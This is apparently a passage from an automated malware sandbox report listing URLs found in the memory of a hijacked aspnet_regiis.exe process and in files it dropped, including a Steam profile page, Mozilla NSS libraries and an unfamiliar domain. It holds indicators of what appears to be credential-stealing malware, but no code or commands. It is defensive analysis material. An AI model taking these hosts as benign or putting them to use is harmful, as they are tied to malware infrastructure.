                      Source: aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC
                      Source: aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=f2hMA1v9Zkc8&l=engl
                      Source: aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english
                      Source: aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/profile.js?v=f3vWO7swdDqp&l=english
                      Source: aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en
                      Source: aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw
                      Source: aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e
                      Source: aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL
                      Source: aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=HeLxjRDbQrcV&l=e
                      Source: aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english
                      Source: 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl
                      Source: aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&l=en
                      Source: aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&
                      Source: aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
                      Source: aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png
                      Source: aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
                      Source: aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
                      Source: aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1&amp
                      Source: aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am
                      Source: aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv
                      Source: aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0
                      Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002DD8000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002DC9000.00000004.00000020.00020000.00000000.sdmp, DBFIEH.3.drString found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
                      Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002DD8000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002DC9000.00000004.00000020.00020000.00000000.sdmp, DBFIEH.3.drString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                      Source: aspnet_regiis.exe, 00000003.00000003.1819386724.0000000002E0B000.00000004.00000020.00020000.00000000.sdmp, BGIIEG.3.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                      Source: aspnet_regiis.exe, 00000003.00000003.1819386724.0000000002E0B000.00000004.00000020.00020000.00000000.sdmp, BGIIEG.3.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                      Source: aspnet_regiis.exe, 00000003.00000003.1819386724.0000000002E0B000.00000004.00000020.00020000.00000000.sdmp, BGIIEG.3.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                      Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/
                      Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D45000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://help.steampowered.com/en/
                      Source: DBFIEH.3.drString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqd4plX4pbW1CbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
                      Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steampowered.com/
                      Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lv.queniujq.cn
                      Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://medal.tv
                      Source: aspnet_regiis.exe, 00000003.00000003.1968723157.0000000002DDB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1968582689.0000000002DD9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2675094445.0000000040028000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2665588204.0000000028269000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1857214387.0000000002DBA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662944978.00000000222FE000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: https://mozilla.org0/
                      Source: file.exeString found in binary or memory: https://pidgin.im0
                      Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://player.vimeo.com
                      Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net
                      Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net/recaptcha/;
                      Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.ytimg.com;
                      Source: file.exeString found in binary or memory: https://sectigo.com/CPS0
                      Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sketchfab.com
                      Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steam.tv/
                      Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast-test.akamaized.net
                      Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast.akamaized.net
                      Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcastchat.akamaized.net
                      Source: 76561199780418869[1].htm.3.drString found in binary or memory: https://steamcommunity.com/
                      Source: aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
                      Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D45000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://steamcommunity.com/discussions/
                      Source: aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
                      Source: 76561199780418869[1].htm.3.drString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199780418869
